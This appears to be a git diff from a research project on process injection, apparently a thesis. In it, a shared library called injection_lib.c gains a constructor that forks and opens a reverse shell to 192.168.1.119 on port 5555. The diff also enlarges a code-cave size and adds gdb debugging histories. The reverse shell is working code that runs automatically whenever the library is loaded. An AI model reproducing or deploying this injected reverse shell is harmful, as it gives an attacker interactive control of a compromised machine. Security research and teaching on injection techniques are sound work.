diff --git a/.gitignore b/.gitignore index c5f2706..7e2887f 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,6 @@ src/log *.aux -*bcf +*/document.bcf *.blg *.fdb_latexmk *.fls diff --git a/src/.output/kit.o b/src/.output/kit.o index d774bf7..87e4b9d 100644 Binary files a/src/.output/kit.o and b/src/.output/kit.o differ diff --git a/src/bin/kit b/src/bin/kit index bba54a0..297c91d 100755 Binary files a/src/bin/kit and b/src/bin/kit differ diff --git a/src/helpers/.gdb_history b/src/helpers/.gdb_history index 8f2ffbf..1330718 100644 --- a/src/helpers/.gdb_history +++ b/src/helpers/.gdb_history @@ -1,31 +1,3 @@ -q -checksec -q -disass main -b *(main+446) -r -si -ni -si -ni -si -q -b *(main+446) -r -x/20i 0x7ffff7ede560 -x/100i 0x7ffff7ede560 -x/1000i 0x7ffff7ede560 -q -b *(main+446) -r -si -disass /r 0x555555555130 -x/20b 0x555555557fd0 -q -b timerfd_settime@plt -r -si -q disass /r 0x555555555130 b timerfd_settime r @@ -254,3 +226,31 @@ si q r q +b *(main+186) +r +x/x *(main+186) +si +x/4x 0x555555555130 +q +disass main +b *(main+52) +r +si +disass main +b *(main+79) +r +c +si +q +r +q +r +q +r +r +q +b *(main+79) +r +si +ni +q diff --git a/src/helpers/injection_lib.c b/src/helpers/injection_lib.c index 1a290a4..d44a79f 100644 --- a/src/helpers/injection_lib.c +++ b/src/helpers/injection_lib.c @@ -1,10 +1,38 @@ #include #include #include +#include +#include +#include +#include +#include +#include + __attribute__((constructor)) static void init() { printf("Library successfully injected!\n"); syslog(LOG_CRIT, "Library called\n"); + + //Just a sample reverse shell (https://www.revshells.com/) + pid_t pid = fork(); + if(pid==0){ + int port = 5555; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + } } \ No newline at end of file diff --git a/src/helpers/injection_lib.o b/src/helpers/injection_lib.o index ef5b9cf..2515475 100644 Binary files a/src/helpers/injection_lib.o and b/src/helpers/injection_lib.o differ diff --git a/src/helpers/injection_lib.so b/src/helpers/injection_lib.so index f1f4e5e..d62edfb 100755 Binary files a/src/helpers/injection_lib.so and b/src/helpers/injection_lib.so differ diff --git a/src/helpers/peda-session-dash.txt b/src/helpers/peda-session-dash.txt new file mode 100644 index 0000000..70782cb --- /dev/null +++ b/src/helpers/peda-session-dash.txt @@ -0,0 +1,3 @@ +break *(main+79) +disable $bpnum + diff --git a/src/helpers/peda-session-ls.txt b/src/helpers/peda-session-ls.txt new file mode 100644 index 0000000..70782cb --- /dev/null +++ b/src/helpers/peda-session-ls.txt @@ -0,0 +1,3 @@ +break *(main+79) +disable $bpnum + diff --git a/src/helpers/peda-session-simple_open.txt b/src/helpers/peda-session-simple_open.txt index 02b7b86..41ce7a4 100644 --- a/src/helpers/peda-session-simple_open.txt +++ b/src/helpers/peda-session-simple_open.txt @@ -1,2 +1,2 @@ -break /home/osboxes/TFG/src/helpers/simple_open.c:14 +break *(main+79) diff --git a/src/helpers/simple_open b/src/helpers/simple_open index b29b041..1aded34 100755 Binary files a/src/helpers/simple_open and b/src/helpers/simple_open differ diff --git a/src/helpers/simple_open.c b/src/helpers/simple_open.c index b7837b9..452eafb 100644 --- a/src/helpers/simple_open.c +++ b/src/helpers/simple_open.c @@ -15,8 +15,9 @@ int main(int argc, char *argv[]) { int fd; char* path = "/home/osboxes/TFG/src/helpers/Makefile"; openat(fd, path, O_RDONLY); + sleep(1); //Second call openat(fd, path, O_RDONLY); - + sleep(1); return 0; } \ No newline at end of file diff --git a/src/helpers/simple_open.o b/src/helpers/simple_open.o index 0b6d512..f239fc9 100644 Binary files a/src/helpers/simple_open.o and b/src/helpers/simple_open.o differ diff --git a/src/user/include/utils/mem/code_caver.h b/src/user/include/utils/mem/code_caver.h index cea2fb8..7f2ca22 100644 --- a/src/user/include/utils/mem/code_caver.h +++ b/src/user/include/utils/mem/code_caver.h @@ -10,7 +10,7 @@ #include "../common/constants.h" -#define CODE_CAVE_LENGTH_BYTES 0x40 +#define CODE_CAVE_LENGTH_BYTES 0xA0 #define NULL_BYTE 0x00 __u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){